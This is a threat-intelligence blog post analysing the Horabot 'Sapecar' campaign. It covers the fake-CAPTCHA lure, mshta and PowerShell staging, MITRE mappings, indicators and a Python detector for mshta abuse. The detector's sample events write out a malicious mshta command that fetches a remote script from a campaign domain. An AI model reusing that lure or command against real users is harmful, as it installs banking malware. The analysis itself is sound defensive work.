Unpacking the "Sapecar" Campaign: Technical Analysis of the Horabot Banking Trojan in Mexico


The threat landscape in Latin America continues to evolve with increasing complexity, as evidenced by a recent surge in activity surrounding Horabot. This multi-stage threat bundle—comprising a modular banking Trojan and an automated email spreader—has recently been observed targeting users in Mexico through a sophisticated "Sapecar" campaign.

At SecLookup, our mission is to provide proactive intelligence against emerging threats. Our threat intelligence platform was actively detecting and blocking the infrastructure associated with this campaign well before its public disclosure, ensuring our users remained protected against these deceptive tactics. In this post, we will break down the technical nuances of the attack chain, the threat actor's tactics, and the specific indicators identified during our analysis.

Executive Summary

The Horabot campaign, dubbed "Sapecar" by researchers at Kaspersky GReAT, represents a significant evolution in social engineering-based malware delivery. The campaign primarily targets Mexican financial institutions and their customers. The attack utilizes a deceptive "Fake CAPTCHA" lure that tricks users into executing malicious commands manually via the Windows Run dialog—a technique increasingly favored by modern stealers and bankers to bypass traditional browser-based security controls. Once executed, the infection chain deploys a PowerShell-based downloader that eventually leads to the installation of Horabot, a Trojan capable of stealing sensitive financial data and turning the victim's machine into a distribution node for further phishing campaigns.

Threat Analysis: The "Sapecar" Kill Chain

The Horabot attack chain is a masterclass in Living-off-the-Land (LotL) techniques combined with psychological manipulation. By leveraging legitimate Windows utilities, the adversary minimizes their file-based footprint and avoids triggering basic signature-based detection.

Stage 1: Social Engineering and the Fake CAPTCHA

The attack begins with a phishing email or a malicious redirection to a landing page designed to mimic a standard security verification screen. These pages are often hosted on newly registered domains such as evs.grupotuis[.]buzz.

Unlike traditional drive-by downloads, this campaign utilizes a "manual execution" lure. The page displays a fake CAPTCHA and instructs the user to:

  1. Press Win + R to open the Windows Run dialog.

  2. Paste the malicious command, which the page has already placed in the user's clipboard via JavaScript.

  3. Press Enter.

This tactic effectively bypasses many web-filtering and sandbox solutions because the malicious action is initiated by the user through a legitimate system component, rather than being directly downloaded or executed by the browser.

Stage 2: Execution via MSHTA and PowerShell

The command pasted into the Run dialog typically invokes mshta.exe, a legitimate Windows utility used to execute Microsoft HTML Applications (HTAs). The command points to a remote URL, such as https://evs.grupotuis[.]buzz/0capcha17/, which serves a malicious script.

This script initiates a PowerShell sequence that performs environment checks, establishes persistence, and downloads the next stage of the malware. Proxying execution through mshta.exe is a well-known technique, catalogued in MITRE ATT&CK as T1218.005, in which malicious code runs under a trusted, signed Windows binary.

Stage 3: The Horabot Payload

The final payload is a sophisticated banking Trojan designed specifically for the Mexican market. Its primary capabilities include:

  • Credential Harvesting: Intercepting login credentials for online banking portals.

  • Form Grabbing: Capturing data entered into web forms.

  • Email Spreading: Accessing the victim's Outlook or webmail to send further phishing lures to the victim's contacts, so that the infection propagates across organizations and social circles.

  • Remote Access: Providing the attacker with a backdoor to the infected system.

The "Sapecar" campaign is notable for its use of diverse infrastructure, including domains like aufal.filevexcasv[.]buzz and cgf.midasx[.]site, which were used for command-and-control (C2) and payload delivery.

MITRE ATT&CK Mapping

| Tactic | Technique | ID |
|---|---|---|
| Initial Access | Phishing: Malicious Link | T1566.002 |
| Execution | User Execution: Malicious Link | T1204.001 |
| Execution | Signed Binary Proxy Execution: Mshta | T1218.005 |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
| Persistence | Boot or Logon Autostart Execution: Registry Run Keys | T1547.001 |
| Defense Evasion | Obfuscated Files or Information | T1027 |
| Exfiltration | Exfiltration Over C2 Channel | T1041 |

SecLookup Detection

The SecLookup threat intelligence platform proactively identified the infrastructure used in this Horabot campaign. Our systems flagged the following domains as malicious based on their registration patterns, hosting providers, and association with known malware distribution scripts:

Indicators of Compromise (IOCs)

IP Addresses

64.177.80.44

File Hashes (MD5)

c882d948d44a65019df54b0b2996677f
6272ef6ac1de8fb4bdd4a760be7ba5ed
4caa797130b5f7116f11c0b48013e430

Recommendations

To defend against Horabot and similar social engineering-led campaigns, SecLookup recommends the following actions:

  1. Block LOLBAS Execution: Restrict the execution of mshta.exe, powershell.exe, and cmd.exe for standard users where not operationally required. Monitor for mshta.exe making external network connections.

  2. User Awareness Training: Educate employees on the dangers of the Windows Run dialog (Win+R). Emphasize that legitimate websites—especially security verification pages—will never ask a user to paste commands into the Run dialog.

  3. Endpoint Monitoring: Deploy EDR solutions to alert on suspicious parent-child process relationships, such as a web browser or the Run dialog launching mshta.exe.

  4. Implement DNS Filtering: Use a threat intelligence-driven DNS filtering service to block access to known malicious domains like those identified in the Horabot infrastructure.

  5. Audit Clipboard Operations: Although such auditing is difficult to implement at scale, security teams should be aware that web-based "copy-to-clipboard" events are being weaponized to stage the Run-dialog command.
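As an added detection example (not SecLookup's or Kaspersky's code), the following Python checker runs over constructed Sysmon-style process-creation and network-connection events and flags the mshta.exe behaviours described in Stage 2 and in recommendation 3: the Run dialog (hosted by explorer.exe) or a browser launching mshta.exe, mshta.exe making an outbound connection, and mshta.exe spawning PowerShell. The event schema, field names and the LAUNCHERS set are assumptions; the sample events are constructed, reusing only the domain and IP already cited in this post.

```python
import re

# Constructed Sysmon-style events (ID 1 = process create, ID 3 = network connect); not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta https://evs.grupotuis.buzz/0capcha17/"},          # Run dialog -> mshta -> remote URL
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta "C:\Program Files\Vendor\setup.hta"'},           # local HTA: lower severity
    {"id": 3, "image": r"C:\Windows\System32\mshta.exe", "dst_ip": "64.177.80.44", "dst_port": 443},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe", "cmdline": "powershell.exe -Command <constructed>"},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe"},                                          # benign: explorer -> notepad
]

REMOTE_RE = re.compile(r"https?://", re.IGNORECASE)   # mshta fetching its HTA over HTTP(S)
LAUNCHERS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}  # Run dialog host + browsers (assumed)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return findings for the mshta-centred behaviours of the Sapecar chain, in event order."""
    findings = []
    for ev in events:
        image, parent = basename(ev.get("image", "")), basename(ev.get("parent", ""))
        if ev["id"] == 1 and image == "mshta.exe" and parent in LAUNCHERS:
            # Any Run-dialog/browser -> mshta launch is suspicious; a remote URL argument makes it high.
            remote = bool(REMOTE_RE.search(ev.get("cmdline", "")))
            findings.append({"technique": "T1218.005", "severity": "high" if remote else "medium",
                             "reason": f"{parent} launched mshta.exe" + (" with a remote URL" if remote else "")})
        elif ev["id"] == 3 and image == "mshta.exe":
            # Recommendation 1: mshta.exe should not be talking to the network.
            findings.append({"technique": "T1218.005", "severity": "high",
                             "reason": f"mshta.exe connected to {ev['dst_ip']}:{ev['dst_port']}"})
        elif ev["id"] == 1 and parent == "mshta.exe" and image == "powershell.exe":
            # Stage 2: the HTA hands off to a PowerShell downloader.
            findings.append({"technique": "T1059.001", "severity": "high",
                             "reason": "mshta.exe spawned powershell.exe"})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['severity']}] {f['technique']}: {f['reason']}")
```

The benign explorer.exe to notepad.exe event produces no finding, and the local HTA launch is rated medium rather than high so that analysts can triage it separately from the remote-URL pattern.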